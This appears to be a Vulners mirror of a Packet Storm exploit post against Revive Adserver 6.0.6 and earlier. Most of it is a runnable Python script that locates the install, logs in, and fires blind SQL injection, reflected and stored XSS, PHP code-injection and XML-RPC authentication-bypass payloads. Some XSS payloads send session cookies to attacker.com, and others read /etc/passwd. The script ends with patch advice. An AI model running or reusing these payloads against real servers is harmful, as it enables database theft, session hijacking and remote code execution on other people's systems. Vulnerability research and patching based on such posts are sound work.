Vulners
Lucene search
๐ Revive Adserver 6.0.6 XSS / SQL Injection / Code Execution
๐๏ธย 08 Jun 2026ย 00:00:00Reported byย indoushkaTypeย 
ย packetstorm๐ย packetstorm.news๐ย 3ย Views
| Reporter | Title | Published | Views | Family All 20 |
|---|---|---|---|---|
 | CVE-2026-34912 | 5 Jun 202600:00 | โ | cve |
| CVE-2026-34913 | 5 Jun 202600:00 | โ | cve |
| CVE-2026-34914 | 5 Jun 202600:00 | โ | cve |
| CVE-2026-34915 | 5 Jun 202600:00 | โ | cve |
| CVE-2026-34916 | 5 Jun 202600:00 | โ | cve |
| CVE-2026-34917 | 5 Jun 202600:00 | โ | cve |
| CVE-2026-44956 | 5 Jun 202600:00 | โ | cve |
| CVE-2026-44958 | 5 Jun 202600:00 | โ | cve |
| CVE-2026-44959 | 5 Jun 202600:00 | โ | cve |
| CVE-2026-44961 | 5 Jun 202600:00 | โ | cve |
10
==================================================================================================================================
| # Title : Revive Adserver โค 6.0.6 Multi-Vulnerability |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : https://www.revive-adserver.com/ |
==================================================================================================================================
[+] Summary : This Python framework is designed to assess and attempt exploitation of multiple reported vulnerabilities in a Revive Adserver deployment.
It supports target discovery, optional authentication, and testing across several vulnerability categories.
[+] POC :
#!/usr/bin/env python3
import requests
import sys
import argparse
import time
import re
from urllib.parse import urljoin, quote
class ReviveExploit:
def __init__(self, target, username=None, password=None):
self.target = target.rstrip('/')
self.session = requests.Session()
self.username = username
self.password = password
self.cookies = {}
self.base_paths = ['', '/revive-adserver', '/www', '/adserver', '/revive']
def find_revive_path(self):
"""Finding the correct path to install Revive Adserver"""
for path in self.base_paths:
test_urls = [
urljoin(self.target, f"{path}/www/index.php"),
urljoin(self.target, f"{path}/index.php"),
urljoin(self.target, f"{path}/delivery/zone-include.php")
]
for url in test_urls:
try:
resp = self.session.get(url, timeout=5)
if "Revive Adserver" in resp.text or "zone-include" in resp.text or "adserver" in resp.text:
print(f"[+] ุชู
ุงูุนุซูุฑ ุนูู Revive Adserver ูู: {url}")
self.revive_path = path
return True
except:
continue
print("[-] No results found Revive Adserver")
return False
def login(self):
"""Log in as a regular user (Advertiser)"""
if not self.username or not self.password:
print("[!] Username and password not provided")
return False
login_url = urljoin(self.target, f"{self.revive_path}/www/admin/index.php")
data = {
'username': self.username,
'password': self.password,
'submit': 'Login'
}
try:
resp = self.session.post(login_url, data=data, allow_redirects=False)
if resp.status_code == 302 and ('PHPSESSID' in self.session.cookies or 'session' in resp.headers.get('Set-Cookie', '')):
print(f"[+] You have logged in as: {self.username}")
self.cookies = dict(self.session.cookies)
return True
else:
print("[-] login failed")
return False
except Exception as e:
print(f"[-] mistake: {e}")
return False
def exploit_sqli_blind(self):
"""CVE-2026-34914: Blind SQL Injection in zone-include.php"""
print("\n[+] a test Blind SQL Injection (CVE-2026-34914)...")
payloads = [
"1' AND (SELECT * FROM (SELECT(SLEEP(5)))a) -- -",
"1' AND (SELECT BENCHMARK(5000000,MD5('test'))) -- -",
"1' AND (SELECT 1 FROM users WHERE id=1)='1' -- -",
"-1' UNION SELECT version(),user(),database() -- -"
]
inject_url = urljoin(self.target, f"{self.revive_path}/delivery/zone-include.php")
for payload in payloads:
start_time = time.time()
params = {'clientid': payload, 'zoneid': '1'}
try:
resp = self.session.get(inject_url, params=params, timeout=10)
elapsed = time.time() - start_time
if elapsed >= 4:
print(f"[!] SQL Injection may be present! Response time: {elapsed:.2f} seconds")
print(f" Load: {payload}")
if "SQL syntax" in resp.text or "mysql_fetch" in resp.text:
print(f"[!] SQL error displayed! Payload: {payload}")
print(f" The truncated reply: {resp.text[:200]}")
except requests.Timeout:
print(f"[!] The halt in demand is an indicator of SQL Injection (Time-based): {payload}")
except Exception as e:
pass
def exploit_reflected_xss(self):
"""CVE-2026-34915: Reflected XSS zone-include.php"""
print("\n[+] Reflected XSS (CVE-2026-34915)...")
xss_payloads = [
'"><script>alert("XSS")</script>',
'"><img src=x onerror=alert(document.cookie)>',
"'><svg/onload=alert('XSS')>",
'"><script>fetch("http://attacker.com/steal?c="+document.cookie)</script>',
'javascript:alert("XSS")'
]
inject_url = urljoin(self.target, f"{self.revive_path}/delivery/zone-include.php")
for payload in xss_payloads:
params = {'clientid': payload, 'zoneid': '1'}
try:
resp = self.session.get(inject_url, params=params)
if payload.replace('"', '"') != resp.text and payload in resp.text:
print(f"[!] Reflected XSS Possible! Load: {payload}")
print(f"The load appears in the response without filtering.")
except Exception as e:
pass
def exploit_rce_delivery_limitations(self):
"""CVE-2026-34916 & CVE-2026-44959: RCE via delivery limitations"""
print("\n[+] a test Remote Code Execution (CVE-2026-34916 & CVE-2026-44959)...")
rce_payloads = [
"'; system('id'); //",
"'; phpinfo(); //",
"'; echo file_get_contents('/etc/passwd'); //",
"campaignDelimiterComponent}}]; system('id'); /*",
"}}]; phpinfo(); /*"
]
edit_urls = [
urljoin(self.target, f"{self.revive_path}/www/admin/banner-edit.php"),
urljoin(self.target, f"{self.revive_path}/www/admin/campaign-edit.php")
]
for edit_url in edit_urls:
for payload in rce_payloads:
data = {
'submit': 'Save',
'bannerid': '1',
'campaignid': '1',
'limitations[0][logical]': payload,
'limitations[0][component]': 'deliveryLimitations'
}
try:
resp = self.session.post(edit_url, data=data, cookies=self.cookies)
if "saved" in resp.text.lower() or "success" in resp.text.lower():
print(f"[!] ุชู
ุญูุธ ุงูุญู
ููุฉ! ูุฏ ูููู RCE ู
ู
ููุงู: {payload}")
print(f" URL: {edit_url}")
except:
pass
def exploit_stored_xss_fullname(self):
"""CVE-2026-44956: Stored XSS via full name"""
print("\n[+] Stored XSS (CVE-2026-44956) - full name...")
xss_payload = '<script>new Image().src="http://attacker.com/steal?c="+document.cookie</script>'
profile_url = urljoin(self.target, f"{self.revive_path}/www/admin/user-edit.php")
data = {
'submit': 'Save',
'userid': '1',
'full_name': xss_payload,
'email': '[email protected]',
'username': self.username
}
try:
resp = self.session.post(profile_url, data=data, cookies=self.cookies)
if "saved" in resp.text.lower():
print(f"[!] XSS has been stored in full name! Payload: {xss_payload}")
print("The execution will take place when the manager watches. userlog-details.php")
except Exception as e:
print(f"[-] mistake: {e}")
def exploit_xmlrpc_session_reuse(self):
"""CVE-2026-34917: Session reuse XML-RPC"""
print("\n[+] Improper Authentication - Session Reuse (CVE-2026-34917)...")
xmlrpc_url = urljoin(self.target, f"{self.revive_path}/www/api/xmlrpc/index.php")
xml_payload = '''<?xml version="1.0"?>
<methodCall>
<methodName>ox.getAdvertiserList</methodName>
<params>
<param><value><string>{session_id}</string></value></param>
<param><value><string></string></value></param>
</params>
</methodCall>'''.format(session_id=self.cookies.get('PHPSESSID', ''))
try:
resp = self.session.post(xmlrpc_url, data=xml_payload,
headers={'Content-Type': 'text/xml'})
if "faultCode" not in resp.text and "struct" in resp.text:
print("[!] The session can be reused to access the manager's API.!")
print(f"Reply: {resp.text[:200]}")
except:
pass
def exploit_username_xss_bypass(self):
"""CVE-2026-44961: Bypass username verification in XML-RPC"""
print("\n[+] Incomplete Disallowed Inputs (CVE-2026-44961)...")
xmlrpc_url = urljoin(self.target, f"{self.revive_path}/www/api/xmlrpc/index.php")
malicious_usernames = [
'<script>alert("XSS")</script>',
'admin_hacker"><img src=x onerror=alert(1)>',
'../../../../etc/passwd'
]
for bad_user in malicious_usernames:
xml_payload = f'''<?xml version="1.0"?>
<methodCall>
<methodName>ox.addUser</methodName>
<params>
<param><value><string>admin_session</string></value></param>
<param><value><string>admin</string></value></param>
<param><value><struct>
<member><name>username</name><value><string>{bad_user}</string></value></member>
<member><name>password</name><value><string>hacked123</string></value></member>
<member><name>email</name><value><string>[email protected]</string></value></member>
</struct></value></param>
</params>
</methodCall>'''
try:
resp = self.session.post(xmlrpc_url, data=xml_payload,
headers={'Content-Type': 'text/xml'})
if "faultCode" not in resp.text and "boolean" in resp.text:
print(f"[!] Verification was bypassed and a username was created.: {bad_user}")
except:
pass
def exploit_improper_access_control(self):
"""CVE-2026-34912, CVE-2026-34913, CVE-2026-44958: Linking entities without authorization"""
print("\n[+] ุงุฎุชุจุงุฑ Improper Access Control - Linking/Modifying without authorization...")
zone_include_url = urljoin(self.target, f"{self.revive_path}/www/admin/zone-include.php")
data = {
'submit': 'Save',
'zoneid': '2',
'bannerid': '1'
}
try:
resp = self.session.post(zone_include_url, data=data, cookies=self.cookies)
if "success" in resp.text.lower() or "linked" in resp.text.lower():
print("[!] It was linked banner by zone The user does not own it - violation of rights!")
except:
pass
banner_edit_url = urljoin(self.target, f"{self.revive_path}/www/admin/banner-edit.php")
disable_data = {
'submit': 'Save',
'bannerid': '3',
'status': '0'
}
try:
resp = self.session.post(banner_edit_url, data=disable_data, cookies=self.cookies)
if "success" in resp.text.lower():
print("[!] Disabled banner without validity (CVE-2026-44958)!")
except:
pass
def generate_report(self):
"""Generate a comprehensive report of the discovered vulnerabilities."""
print("\n" + "="*60)
print("Test Report Revive Adserver")
print("="*60)
print(f"the goal: {self.target}")
print(f"user: {self.username}")
print(f"Installation path: {getattr(self, 'revive_path', 'unavailable')}")
print("\nRecommendations:")
print("1. Update Revive Adserver to version 6.0.7 or later")
print("2. Change all passwords immediately")
print("3. Check for unauthorized files or users")
print("4. Disable the XML-RPC API if not necessary.")
print("5. Review system logs for suspicious activity")
print("="*60)
def run_all(self):
"""Perform all tests"""
if not self.find_revive_path():
return
if self.username and self.password:
if not self.login():
print("[!] Continue without logging in...")
self.exploit_sqli_blind()
self.exploit_reflected_xss()
self.exploit_rce_delivery_limitations()
self.exploit_stored_xss_fullname()
self.exploit_xmlrpc_session_reuse()
self.exploit_username_xss_bypass()
self.exploit_improper_access_control()
self.generate_report()
def main():
parser = argparse.ArgumentParser(description='Revive Adserver <= 6.0.6 Multi-Exploit PoC')
parser.add_argument('--target', required=True, help='Goal (example): https://example.com)')
parser.add_argument('--username', help='regular username (Advertiser)')
parser.add_argument('--password', help='password')
parser.add_argument('--action', default='all',
choices=['all', 'sqli', 'xss', 'rce', 'iac', 'report'],
help='Test type')
args = parser.parse_args()
exploit = ReviveExploit(args.target, args.username, args.password)
if args.action == 'all':
exploit.run_all()
elif args.action == 'sqli':
exploit.find_revive_path()
exploit.exploit_sqli_blind()
elif args.action == 'xss':
exploit.find_revive_path()
exploit.exploit_reflected_xss()
exploit.exploit_stored_xss_fullname()
elif args.action == 'rce':
exploit.find_revive_path()
if args.username and args.password:
exploit.login()
exploit.exploit_rce_delivery_limitations()
elif args.action == 'iac':
exploit.find_revive_path()
if args.username and args.password:
exploit.login()
exploit.exploit_improper_access_control()
exploit.exploit_xmlrpc_session_reuse()
elif args.action == 'report':
exploit.find_revive_path()
exploit.generate_report()
if __name__ == "__main__":
print("""
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โ Revive Adserver Exploit PoC - โ
โ SQLi, XSS, RCE, Access Control, Auth Bypass โ
โ Affected update: <= 6.0.6 โ
โ by indoushka โ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
""")
main()
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================Data
Build on a solid foundation withย Vulners data
Weย provide theย essential building blocks forย cybersecurity solutions withย comprehensive, structured, andย constantly updated vulnerability andย exploits data
Api
Power your application withย Vulners API
The Vulners REST API offers reliable, high-performance access toย vulnerabilityย intelligence, withย 99.9%ย SLAย uptime andย CDN-backed data delivery forย seamlessย global access
App
Assess and manage vulnerabilities withย Vulnersย tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
08 Jun 2026 00:00Current
6Medium risk
Vulners AI Score6